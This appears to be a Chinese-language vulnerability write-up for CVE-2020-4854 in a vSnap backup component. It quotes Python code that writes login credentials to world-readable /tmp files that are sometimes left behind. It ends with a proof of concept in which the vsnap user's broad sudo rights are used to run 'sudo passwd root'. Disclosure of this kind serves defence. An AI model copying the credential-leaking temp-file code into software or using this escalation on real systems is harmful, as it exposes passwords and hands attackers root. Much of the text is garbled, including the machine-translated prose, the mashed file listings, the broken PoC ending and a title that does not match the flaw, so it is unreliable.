CVE-2020-4854:静态证书脆弱性
验证 vsnapAPI时,用户名和密码写入/tm目录中临时文件,文件名格式vsnap-
-
-
.txt:
def check_password(username, password): code, _ = system.run_shell_command(('%s/python3 -m simplepam' % const.VENV_BIN_DIR), use_sudo=True, cmd_input=[username, password], ignore_error=True, log_error_as=(logging.ERROR)) if code != 0: raise errors.AuthenticationError() [...] [...] def run_shell_command(command, cmd_input=None, use_sudo=False, sudo_user='root', sudo_login=False, timeout=480, ignore_error=False, log_error_as=logging.WARN, log_cmd_as=logging.DEBUG, output_to_file=False, mask_text=[], strip_lines=True, env=None, kill_on_timeout=True, progressfn=None): timed_out = False aborted = False uid = uuid.uuid4().hex outfile_name = '/tmp/vsnap-%s-%s-%s-out.txt' % (os.getpid(), int(time.time()), uid) outfile = open(outfile_name, 'w') outfile.flush() if cmd_input is not None: infile_name = '/tmp/vsnap-%s-%s-%s-in.txt' % (os.getpid(), int(time.time()), uid) infile = open(infile_name, 'w') for line in cmd_input: infile.write(line + '\n') [...]
snap.linux.system.run_shell命令
sloger.log(log_cmd_as), '执行命令: '+log_command_full'proc=子进程.proc
验证后tm文件应删除代码像以下显示多位 vsnap.linux.systemrun_shell_command():
iffile: infile.close()os.remove
因某种原因tmp文件不删除某些认证运行,为vsnap用户揭开密码
spp-sl/tmp/vsnap-*-in.txt-rw-r-r-r-r根1992237/tmp/vsnap-6738-1601580-e5c27e43db9440bce84d0297c2d根根19Oct 105:58/tmp/vsnap-7139160154693-17e3855a3f044e45b588b15c0ef38b-in.txt-rw-r-r-r-r根根19Oct12:53/tmp/vsnap714016011793-c63808a4e484f99a0c01112dfb9-in.txt-rw-r-r-r-r-r根线19 Oct11253/tmp/vsnap-7154-160119324c3d439c226c7d447305b-in.txt
非认证远程攻击者可使用SSH静态证书输入SPP主机Vsnap并切换root,因为Vsnap用户有sudo权限更改root密码:
概念证明
[vsnap@spp ~]$ id uid=991(vsnap) gid=987(vsnap) groups=987(vsnap) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [vsnap@spp ~]$ [vsnap@spp ~]$ sudo -l Matching Defaults entries for vsnap on spp: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty, secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, env_keep+=VS_OFFLOAD_ROOTDIR, env_keep+=VS_OFFLOAD_POOL, env_keep+=VS_OFFLOAD_DEVICE_PATH, env_keep+=VS_OFFLOAD_POOLCACHE, env_keep+=VS_OFFLOAD_STAGE, env_keep+=VS_OFFLOAD_SESSID User vsnap may run the following commands on spp: (root) NOPASSWD: /opt/vsnap/venv/bin/python3 /opt/vsnap/lib/vsnap/cli/* (ALL) NOPASSWD: /usr/bin/mkdir, /usr/bin/rmdir, /usr/bin/chown, /usr/bin/chmod, /usr/bin/id, /usr/bin/cp, /usr/bin/rm, /usr/bin/kill, /usr/bin/systemctl, /usr/bin/readlink, /usr/bin/stat, /usr/sbin/fuser, /usr/bin/truncate, /usr/bin/tee, /bin/iostat, /usr/bin/df, /usr/bin/find, /usr/bin/cat, /usr/bin/mv, /usr/bin/gzip, /usr/bin/gunzip, /usr/bin/ln, /usr/bin/du, /usr/bin/tar, /usr/bin/mount, /usr/bin/umount, /usr/sbin/mkfs, /usr/bin/lsblk, /usr/bin/star, /usr/bin/file, /usr/bin/ps, /usr/bin/grep, /usr/sbin/useradd, /usr/sbin/userdel, /usr/sbin/usermod, /usr/bin/passwd, /usr/bin/smbpasswd, /usr/bin/net, /usr/bin, /usr/bin/yum, /usr/sbin/modprobe, /usr/sbin/parted, /usr/bin/dd, /usr/bin/rescan-scsi-bus.sh, /usr/sbin/blkid, /usr/sbin/pvs, /usr/sbin/gdisk, /lib/udev/scsi_id, /usr/sbin/wipefs, /usr/sbin/partprobe, /sbin/cryptsetup, /usr/sbin/zpool, /usr/sbin/zfs, /usr/sbin/zdb, /usr/bin/vsnap_targetcli /usr/bin/vsnap_targetctl, /opt/vsnap/venv/bin/python3 -m simplepam, /usr/bin/mongoimport, /opt/vsnap/bin/logcollect, /opt/vsnap/bin/logcollect_v2, /opt/vsnap/bin/restore_config, /usr/bin/update-ca-trust, /opt/vsnap/bin/blockmaputil, /opt/vsnap/bin/offload_hook, /opt/vsnap/bin/tar [vsnap@spp ~]$ [vsnap@spp ~]$ sudo passwd root Changing password for user root.新建密码:BADPASSWORD:密码中小于1非数字字符snap@spp~$ssnap@spp~sss#